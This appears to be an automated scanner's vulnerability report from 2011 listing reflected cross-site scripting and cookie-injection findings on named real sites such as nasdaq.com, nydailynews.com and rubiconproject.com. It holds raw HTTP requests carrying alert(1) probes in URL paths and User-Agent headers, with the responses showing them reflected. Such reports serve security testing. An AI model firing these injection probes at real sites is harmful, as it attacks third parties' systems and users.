1.1. http://tap.rubiconproject.com/oz/sensor [cd cookie]
1.2. http://tap.rubiconproject.com/oz/sensor [put_2025 cookie]
1.3. http://tap.rubiconproject.com/oz/sensor [t parameter]
1.4. http://tap.rubiconproject.com/oz/sensor [xt parameter]
2.1. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie]
2.2. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]
2.3. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]
3. Cross-site scripting (reflected)
3.2. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]
3.3. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
3.4. http://www.nasdaq.com/asp/quotesannualreportlink.asp [selected parameter]
3.5. http://www.nydailynews.com/gossip/gatecrasher/index.html [REST URL parameter 1]
3.6. http://www.nydailynews.com/gossip/gatecrasher/index.html [REST URL parameter 2]
3.7. http://www.nydailynews.com/gossip/gatecrasher/index.html [REST URL parameter 3]
3.8. http://www.nasdaq.com/asp/quotesannualreportlink.asp [User-Agent HTTP header]
3.9. http://www.nasdaq.com/asp/summaryquote.asp [User-Agent HTTP header]
3.10. http://news.nasdaq.com/aspxcontent/newsheadlines.aspx [User-Agent HTTP header]
3.11. http://seg.sharethis.com/getSegment.php [__stid cookie]
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:11:29 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=42|5|37|0; Expires=Mon, 13-Feb-2012 02:11:29 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:11:29 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://intermrkts.vo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:12:08 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=34|5|29|0; Expires=Mon, 13-Feb-2012 01:12:08 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://intermrkts.vo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:12:08 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:10:38 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=42|5|37|0; Expires=Mon, 13-Feb-2012 02:10:38 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:10:38 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:07:27 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=40|5|35|0; Expires=Mon, 13-Feb-2012 02:07:27 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 02:07:27 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:44:16 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=35|5|30|0; Expires=Mon, 13-Feb-2012 01:44:16 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:44:16 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:37:13 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=35|5|30|0; Expires=Mon, 13-Feb-2012 01:37:13 GMT; Path=/ Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: lm="13 Feb 2011 01:37:13 GMT"; Version=1; Domain=.rubiconproject Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:37:13 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Tentative |
Host: | http://tap.rubiconproject |
Path: | /oz/sensor |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://intermrkts.vo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:12:38 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject Set-Cookie: dq=34|5|29|0; Expires=Mon, 13-Feb-2012 01:12:38 GMT; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
GET /oz/sensor?p=rubicon&pc Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://intermrkts.vo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 204 No Content Date: Sun, 13 Feb 2011 01:12:38 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Cache-control: private Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://ol5u8o2ka38be |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: ol5u8o2ka38be34j62kt Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=209791819 |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Sun, 13 Feb 2011 17:02:07 GMT Expires: Sun, 13 Feb 2011 17:02:07 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 116 Unable to retrieve spec for http://fcgadgets.appspot alert(1)//c003bbec0a3. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /gampad/ads |
GET /gampad/ads?correlator Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.yelp.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 13 Feb 2011 01:13:58 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1287 GA_googleSetAdConten ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tap.rubiconproject |
Path: | /partner/agent/rubicon |
GET /partner/agent/rubicon Host: tap.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 200 OK Date: Sun, 13 Feb 2011 02:09:14 GMT Server: TRP Apache-Coyote/1.1 Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript;charset Content-Length: 963 Cache-control: private Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Connection: close var oo_profile={ tokenType : "0", tracking : "4944", tags : "Mortgage Refinance,Small Business,Business,Finance and Money,Finance,Inferred Male", tagcloud : [ { tag: "Mortgage Refinan ...[SNIP]... 2496,2202,2496,2203,2204 ] }; try { oz_onPixelsLoaded57ec8;alert(1)/ } catch(ignore) {} |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nasdaq.com |
Path: | /asp/quotesannualrep |
GET /asp/quotesannualrep Host: www.nasdaq.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __unam=2815966-12e1c |
HTTP/1.1 200 OK Date: Sun, 13 Feb 2011 02:07:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 72642 Content-Type: text/html Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script> myP ...[SNIP]... <b>52278<A B=C>CAE6A6BE34E</b> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nydailynews |
Path: | /gossip/gatecrasher/index |
GET /gossipcccf0'%3balert(1)/ Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:37:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70328 Set-Cookie: sto-id-sg-web-8080 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="imagetoolbar" content="no" /> <meta property="og:site_name" conten ...[SNIP]... jQuery.cookie('seen_nydn document.location='http:/ } //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nydailynews |
Path: | /gossip/gatecrasher/index |
GET /gossip/gatecrasher6fd08'%3balert(1)/ Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:38:30 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70328 Set-Cookie: sto-id-sg-web-8080 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="imagetoolbar" content="no" /> <meta property="og:site_name" conten ...[SNIP]... jQuery.cookie('seen_nydn document.location='http:/ } //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nydailynews |
Path: | /gossip/gatecrasher/index |
GET /gossip/gatecrasher/index Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:38:39 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70328 Set-Cookie: sto-id-sg-web-8080 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="imagetoolbar" content="no" /> <meta property="og:site_name" conten ...[SNIP]... .cookie('seen_nydn_ipad', 'yep', { expires: 7 }); document.location='http:/ } //--> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nasdaq.com |
Path: | /asp/quotesannualrep |
GET /asp/quotesannualrep Host: www.nasdaq.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1335e10"-alert(1)- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __unam=2815966-12e1c |
HTTP/1.1 200 OK Date: Sun, 13 Feb 2011 02:07:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 72678 Content-Type: text/html Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script> myP ...[SNIP]... teBoxSymbolArray[0] = "NDAQ"; var quoteBoxNumSymbols = 1; var jsUserAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1335e10"-alert(1)- </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nasdaq.com |
Path: | /asp/summaryquote.asp |
GET /asp/summaryquote.asp HTTP/1.1 Host: www.nasdaq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c7a3"-alert(1)- Connection: close Cookie: s_pers=%20s_nr%3D129 |
HTTP/1.1 200 OK Connection: close Date: Sun, 13 Feb 2011 01:54:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 72979 Content-Type: text/html Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--***** ...[SNIP]... pe="text/javascript"> var quoteBoxSelectedSymbol= ""; var quoteBoxSymbolArray = new Array(0); var quoteBoxNumSymbols = 0; var jsUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c7a3"-alert(1)- </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://news.nasdaq.com |
Path: | /aspxcontent/newshea |
GET /aspxcontent/newshea Host: news.nasdaq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)917b9"-alert(1)- Connection: close |
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 13 Feb 2011 01:36:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.nasdaq.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 105374 <!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 transitional//EN" "http://www.w3.org/tr <html xmlns="http://www.w3.org <head> <title>Market Ne ...[SNIP]... type="text/javascript"> var quoteBoxSelectedSymbol= "NDAQ"; var quoteBoxSymbolArray = new Array(0); var quoteBoxNumSymbols = 0; var jsUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)917b9"-alert(1)- </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://seg.sharethis.com |
Path: | /getSegment.php |
GET /getSegment.php?purl=http Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=Cs8yN00nznknh |
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sun, 13 Feb 2011 01:12:11 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml" Content-Length: 717 <html> <head><title>ShareThis Segmenter</title></head> <body> <img src="http://b.scorec <script type="text ...[SNIP]... <div style='display:none' userid: Search Segment</div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /G10937/a4/0/0/0.302 |
GET /G10937/a4/0/0/0.302?tgt=http%3a//a9ff4c2a778 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://www.rollcall.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=TSeEzxMBEwoA |